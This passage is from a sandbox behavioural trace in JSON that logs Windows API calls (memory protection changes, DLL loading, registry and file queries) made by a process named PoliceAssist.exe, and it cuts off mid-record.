"BaseAddress", "value": "0x06460000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 374 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06460000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 375 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffecf7ea000" }, { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 376 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffecf7ea000" }, { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 377 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x00000010" } ], "repeated": 0, "id": 378 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffecf7ea000" }, { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 379 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffecf7ea000" }, { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 380 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SOFTWARE\\Microsoft\\CTF\\Compatibility\\PoliceAssist.exe" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\PoliceAssist.exe" } ], "repeated": 0, "id": 381 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x04090409", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000409" }, { "name": "LanguageName", "value": "English (United States)" } ], "repeated": 0, "id": 382 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 383 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 384 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x04090409", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000409" }, { "name": "LanguageName", "value": "English (United States)" } ], "repeated": 0, "id": 385 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 386 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1878000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 387 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000258" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" } ], "repeated": 0, "id": 388 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000258" }, { "name": "ValueName", "value": "PreferExternalManifest" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest" } ], "repeated": 0, "id": 389 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 390 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "filesystem", "api": "NtOpenFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x001200a9", "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll.Config" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 391 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000258" }, { "name": "DesiredAccess", "value": "0x00120089", "pretty_value": "FILE_GENERIC_READ" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 392 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 393 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "comctl32" }, { "name": "BaseAddress", "value": "0x7ffecf5a0000" } ], "repeated": 0, "id": 394 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffecf5a0000", "arguments": [ { "name": "lpLibFileName", "value": "comctl32" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 395 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00860000" }, { "name": "RegionSize", "value": "0x00002000" } ], "repeated": 0, "id": 396 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 397 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "HIMAGELIST_QueryInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf61fa20" } ], "repeated": 0, "id": 398 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "DrawShadowText" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf69cfe0" } ], "repeated": 0, "id": 399 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "DrawSizeBox" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf62f780" } ], "repeated": 0, "id": 400 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "DrawScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf610d20" } ], "repeated": 0, "id": 401 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "SizeBoxHwnd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf6152d0" } ], "repeated": 0, "id": 402 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "ScrollBar_MouseMove" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf6921e0" } ], "repeated": 0, "id": 403 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "ScrollBar_Menu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf691ff0" } ], "repeated": 0, "id": 404 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "HandleScrollCmd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf691f50" } ], "repeated": 0, "id": 405 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "DetachScrollBars" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf5a2440" } ], "repeated": 0, "id": 406 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "AttachScrollBars" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf617150" } ], "repeated": 0, "id": 407 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "CCSetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf612230" } ], "repeated": 0, "id": 408 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "CCGetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf62bcc0" } ], "repeated": 0, "id": 409 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "CCEnableScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf5a2830" } ], "repeated": 0, "id": 410 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "QuerySystemGestureStatus" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf691fb0" } ], "repeated": 0, "id": 411 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000042" }, { "name": "uiParam", "value": "0x00000010" } ], "repeated": 2, "id": 412 }, { "timestamp": "2025-11-20 10:58:26,125", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x14001f39f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05927000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 413 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f3c5", "parentcaller": "0x140005850", "category": "misc", "api": "FindResourceExW", "status": true, "return": "0x1401313a0", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "Type", "value": "#9" }, { "name": "Name", "value": "#212" }, { "name": "Language", "value": "0x00000000" } ], "repeated": 0, "id": 414 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f3c5", "parentcaller": "0x140005850", "category": "misc", "api": "LoadResource", "status": true, "return": "0x140136120", "arguments": [ { "name": "Module", "value": "0x140000000" }, { "name": "ResourceInfo", "value": "0x1401313a0" } ], "repeated": 0, "id": 415 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "windows", "api": "FindWindowW", "status": true, "return": "0x00010098", "arguments": [ { "name": "ClassName", "value": "Shell_TrayWnd" }, { "name": "WindowName", "value": "" } ], "repeated": 0, "id": 416 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000260" }, { "name": "DesiredAccess", "value": "0x00001000", "pretty_value": "PROCESS_QUERY_LIMITED_INFORMATION" }, { "name": "ProcessIdentifier", "value": "3308" } ], "repeated": 0, "id": 417 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000260" } ], "repeated": 0, "id": 418 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2a57000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 419 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee2a57000" }, { "name": "ModuleName", "value": "SHELL32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 420 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" } ], "repeated": 0, "id": 421 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x008acd80", "arguments": [ { "name": "FileName", "value": "C:\\Temp" }, { "name": "FirstCreateTimeLow", "value": "0x0c174eca" }, { "name": "FirstCreateTimeHigh", "value": "0x01dc598a" } ], "repeated": 0, "id": 422 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000260" } ], "repeated": 0, "id": 423 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 424 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "windows.storage.dll" } ], "repeated": 0, "id": 425 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" } ], "repeated": 0, "id": 426 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000260" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 427 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000264" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000260" }, { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" } ], "repeated": 0, "id": 428 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000264" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedec70000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0079b000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 429 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf3e5000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 430 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedf281000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00002000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 431 }, { "timestamp": "2025-11-20 10:58:26,141", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "Wldp.dll" } ], "repeated": 0, "id": 432 }, { "timestamp": "2025-11-20 